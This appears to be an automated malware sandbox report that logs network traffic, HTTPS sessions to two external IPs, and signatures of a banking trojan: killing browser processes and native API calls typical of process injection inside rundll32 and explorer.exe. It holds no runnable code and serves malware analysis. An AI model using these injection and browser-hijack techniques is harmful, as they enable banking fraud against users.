Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907

Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe		8_2_0E454948
Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe		8_2_0E454948

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_000001CEAFE2D2B6 NtAllocateVirtualMemory,	3_3_000001CEAFE2D2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_000001CEAFE2D326 NtProtectVirtualMemory,	3_3_000001CEAFE2D326
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA4BE0 NtProtectVirtualMemory,	3_2_000001CEAFCA4BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA4FF0 NtQueueApcThread,	3_2_000001CEAFCA4FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC717B0 NtClose,NtClose,	3_2_000001CEAFC717B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA4360 NtCreateThreadEx,	3_2_000001CEAFCA4360
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA4740 NtFreeVirtualMemory,	3_2_000001CEAFCA4740
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA3F40 NtAllocateVirtualMemory,	3_2_000001CEAFCA3F40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC87A50 NtSetContextThread,	3_2_000001CEAFC87A50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC71600 NtClose,RtlExitUserThread,	3_2_000001CEAFC71600
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC88149 NtSetContextThread,	3_2_000001CEAFC88149
Source: C:\Windows\System32\rundll32.exe	Code function: 4_3_00000276197BD326 NtProtectVirtualMemory,	4_3_00000276197BD326
Source: C:\Windows\System32\rundll32.exe	Code function: 4_3_00000276197BD2B6 NtAllocateVirtualMemory,	4_3_00000276197BD2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196271B0 NtClose,	4_2_00000276196271B0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619638149 NtSetContextThread,	4_2_0000027619638149
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619654BE0 NtProtectVirtualMemory,	4_2_0000027619654BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619654FF0 NtQueueApcThread,	4_2_0000027619654FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196217B0 NtClose,NtClose,	4_2_00000276196217B0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619654360 NtCreateThreadEx,	4_2_0000027619654360
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619653F40 NtAllocateVirtualMemory,	4_2_0000027619653F40
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619654740 NtFreeVirtualMemory,	4_2_0000027619654740
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619621600 NtClose,RtlExitUserThread,	4_2_0000027619621600
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619637A50 NtSetContextThread,	4_2_0000027619637A50
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000002339FC7D2B6 NtAllocateVirtualMemory,	6_3_000002339FC7D2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000002339FC7D326 NtProtectVirtualMemory,	6_3_000002339FC7D326
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB4360 NtCreateThreadEx,	6_2_000002339FBB4360
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB817B0 NtClose,NtClose,	6_2_000002339FB817B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB3F40 NtAllocateVirtualMemory,	6_2_000002339FBB3F40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB4740 NtFreeVirtualMemory,	6_2_000002339FBB4740
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB81600 NtClose,RtlExitUserThread,	6_2_000002339FB81600
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB97A50 NtSetContextThread,	6_2_000002339FB97A50
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB98149 NtSetContextThread,	6_2_000002339FB98149
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB4FF0 NtQueueApcThread,	6_2_000002339FBB4FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB4BE0 NtProtectVirtualMemory,	6_2_000002339FBB4BE0
Source: C:\Windows\explorer.exe	Code function: 8_2_0303C704 NtDelayExecution,	8_2_0303C704
Source: C:\Windows\explorer.exe	Code function: 8_2_0303B388 NtAllocateVirtualMemory,	8_2_0303B388
Source: C:\Windows\explorer.exe	Code function: 8_2_030382B4 NtFreeVirtualMemory,	8_2_030382B4
Source: C:\Windows\explorer.exe	Code function: 8_2_030401A0 NtFreeVirtualMemory,	8_2_030401A0
Source: C:\Windows\explorer.exe	Code function: 8_2_030381C8 NtWriteFile,	8_2_030381C8
Source: C:\Windows\explorer.exe	Code function: 8_2_03038240 NtClose,	8_2_03038240
Source: C:\Windows\explorer.exe	Code function: 8_2_030380B8 RtlInitUnicodeString,NtCreateFile,	8_2_030380B8
Source: C:\Windows\explorer.exe	Code function: 8_2_083882B4 NtFreeVirtualMemory,	8_2_083882B4
Source: C:\Windows\explorer.exe	Code function: 8_2_0838B388 NtAllocateVirtualMemory,	8_2_0838B388
Source: C:\Windows\explorer.exe	Code function: 8_2_08388240 NtClose,	8_2_08388240
Source: C:\Windows\explorer.exe	Code function: 8_2_083880B8 RtlInitUnicodeString,NtCreateFile,	8_2_083880B8
Source: C:\Windows\explorer.exe	Code function: 8_2_0838C704 NtDelayExecution,	8_2_0838C704
Source: C:\Windows\explorer.exe	Code function: 8_2_083901A0 NtFreeVirtualMemory,	8_2_083901A0
Source: C:\Windows\explorer.exe	Code function: 8_2_083881C8 NtWriteFile,	8_2_083881C8
Source: C:\Windows\explorer.exe	Code function: 8_2_088582B4 NtFreeVirtualMemory,	8_2_088582B4
Source: C:\Windows\explorer.exe	Code function: 8_2_0885B388 NtAllocateVirtualMemory,	8_2_0885B388
Source: C:\Windows\explorer.exe	Code function: 8_2_088580B8 RtlInitUnicodeString,NtCreateFile,	8_2_088580B8
Source: C:\Windows\explorer.exe	Code function: 8_2_08858240 NtClose,	8_2_08858240
Source: C:\Windows\explorer.exe	Code function: 8_2_088601A0 NtFreeVirtualMemory,	8_2_088601A0
Source: C:\Windows\explorer.exe	Code function: 8_2_088581C8 NtWriteFile,	8_2_088581C8
Source: C:\Windows\explorer.exe	Code function: 8_2_0885C704 NtDelayExecution,	8_2_0885C704
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45241C NtAllocateVirtualMemory,	8_2_0E45241C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45248C NtFreeVirtualMemory,	8_2_0E45248C

Contains functionality to communicate with device drivers

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8D56B7C: CreateFileW,DeviceIoControl,CloseHandle,

3_2_00007FF8A8D56B7C

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\rundll32.exe

3_2_00007FF8A8CFDA48

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D069A0	3_2_00007FF8A8D069A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D2E90C	3_2_00007FF8A8D2E90C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DD9AF0	3_2_00007FF8A8DD9AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFFA78	3_2_00007FF8A8CFFA78
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DE4A20	3_2_00007FF8A8DE4A20
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D0BA28	3_2_00007FF8A8D0BA28
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D179F8	3_2_00007FF8A8D179F8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DCBB1C	3_2_00007FF8A8DCBB1C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFDCBC	3_2_00007FF8A8CFDCBC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFBCB8	3_2_00007FF8A8CFBCB8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D09C5C	3_2_00007FF8A8D09C5C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7AC00	3_2_00007FF8A8D7AC00
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFEDE0	3_2_00007FF8A8CFEDE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D09D8C	3_2_00007FF8A8D09D8C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D1BEDC	3_2_00007FF8A8D1BEDC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7CEB0	3_2_00007FF8A8D7CEB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D56E84	3_2_00007FF8A8D56E84
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D41E90	3_2_00007FF8A8D41E90
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D72E90	3_2_00007FF8A8D72E90
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D19E64	3_2_00007FF8A8D19E64
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFAF20	3_2_00007FF8A8CFAF20
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D070EC	3_2_00007FF8A8D070EC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D061E0	3_2_00007FF8A8D061E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DD01A4	3_2_00007FF8A8DD01A4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D2C180	3_2_00007FF8A8D2C180
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D250F8	3_2_00007FF8A8D250F8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D322D4	3_2_00007FF8A8D322D4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D72200	3_2_00007FF8A8D72200
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7C3D0	3_2_00007FF8A8D7C3D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D1C3A8	3_2_00007FF8A8D1C3A8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D2530C	3_2_00007FF8A8D2530C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D05320	3_2_00007FF8A8D05320
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DB9470	3_2_00007FF8A8DB9470
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D0B560	3_2_00007FF8A8D0B560
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DD8554	3_2_00007FF8A8DD8554
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D1D698	3_2_00007FF8A8D1D698
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D746A0	3_2_00007FF8A8D746A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D07680	3_2_00007FF8A8D07680
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DCD670	3_2_00007FF8A8DCD670
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DDC638	3_2_00007FF8A8DDC638
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D4D604	3_2_00007FF8A8D4D604
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D737C0	3_2_00007FF8A8D737C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D75780	3_2_00007FF8A8D75780
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFC878	3_2_00007FF8A8CFC878
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFA83C	3_2_00007FF8A8CFA83C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DE5834	3_2_00007FF8A8DE5834
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC8CBE0	3_2_000001CEAFC8CBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC913A3	3_2_000001CEAFC913A3
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC92BB0	3_2_000001CEAFC92BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC9FBC0	3_2_000001CEAFC9FBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA2F60	3_2_000001CEAFCA2F60
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC7A730	3_2_000001CEAFC7A730
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA1F40	3_2_000001CEAFCA1F40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC8BED0	3_2_000001CEAFC8BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC966E0	3_2_000001CEAFC966E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC816A0	3_2_000001CEAFC816A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC842A0	3_2_000001CEAFC842A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC982A0	3_2_000001CEAFC982A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC766C0	3_2_000001CEAFC766C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA0210	3_2_000001CEAFCA0210
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC97220	3_2_000001CEAFC97220
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC799D0	3_2_000001CEAFC799D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC9B5E0	3_2_000001CEAFC9B5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC955E0	3_2_000001CEAFC955E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC84DB0	3_2_000001CEAFC84DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC855C0	3_2_000001CEAFC855C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC94550	3_2_000001CEAFC94550
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC75D60	3_2_000001CEAFC75D60
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC89120	3_2_000001CEAFC89120
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC8B4E0	3_2_000001CEAFC8B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC79500	3_2_000001CEAFC79500
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC8A100	3_2_000001CEAFC8A100
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA1490	3_2_000001CEAFCA1490
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA2812	3_2_000001CEAFCA2812
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619639120	4_2_0000027619639120
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619629500	4_2_0000027619629500
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761963A100	4_2_000002761963A100
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761963B4E0	4_2_000002761963B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619634DB0	4_2_0000027619634DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619625D60	4_2_0000027619625D60
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619644550	4_2_0000027619644550
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619652812	4_2_0000027619652812
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761963CBE0	4_2_000002761963CBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761964FBC0	4_2_000002761964FBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619651490	4_2_0000027619651490
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761962A730	4_2_000002761962A730
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196466E0	4_2_00000276196466E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196266C0	4_2_00000276196266C0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761963BED0	4_2_000002761963BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196413A3	4_2_00000276196413A3
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619642BB0	4_2_0000027619642BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619652F60	4_2_0000027619652F60
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619651F40	4_2_0000027619651F40
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619647220	4_2_0000027619647220
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619650210	4_2_0000027619650210
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196455E0	4_2_00000276196455E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761964B5E0	4_2_000002761964B5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196355C0	4_2_00000276196355C0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196299D0	4_2_00000276196299D0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196316A0	4_2_00000276196316A0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196342A0	4_2_00000276196342A0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196482A0	4_2_00000276196482A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB2F60	6_2_000002339FBB2F60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBAFBC0	6_2_000002339FBAFBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA2BB0	6_2_000002339FBA2BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA13A3	6_2_000002339FBA13A3
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA66E0	6_2_000002339FBA66E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB1F40	6_2_000002339FBB1F40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB8A730	6_2_000002339FB8A730
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB9BED0	6_2_000002339FB9BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB866C0	6_2_000002339FB866C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB916A0	6_2_000002339FB916A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB942A0	6_2_000002339FB942A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA82A0	6_2_000002339FBA82A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB0210	6_2_000002339FBB0210
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBAB5E0	6_2_000002339FBAB5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA55E0	6_2_000002339FBA55E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA7220	6_2_000002339FBA7220
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB85D60	6_2_000002339FB85D60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB899D0	6_2_000002339FB899D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB955C0	6_2_000002339FB955C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB94DB0	6_2_000002339FB94DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB9A100	6_2_000002339FB9A100
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB89500	6_2_000002339FB89500
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB9B4E0	6_2_000002339FB9B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA4550	6_2_000002339FBA4550
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB99120	6_2_000002339FB99120
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB1490	6_2_000002339FBB1490
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB2812	6_2_000002339FBB2812
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB9CBE0	6_2_000002339FB9CBE0
Source: C:\Windows\explorer.exe	Code function: 8_2_03032164	8_2_03032164
Source: C:\Windows\explorer.exe	Code function: 8_2_03031A7C	8_2_03031A7C
Source: C:\Windows\explorer.exe	Code function: 8_2_03031A8C	8_2_03031A8C
Source: C:\Windows\explorer.exe	Code function: 8_2_08381A7C	8_2_08381A7C
Source: C:\Windows\explorer.exe	Code function: 8_2_08381A8C	8_2_08381A8C
Source: C:\Windows\explorer.exe	Code function: 8_2_08382164	8_2_08382164
Source: C:\Windows\explorer.exe	Code function: 8_2_08851A8C	8_2_08851A8C
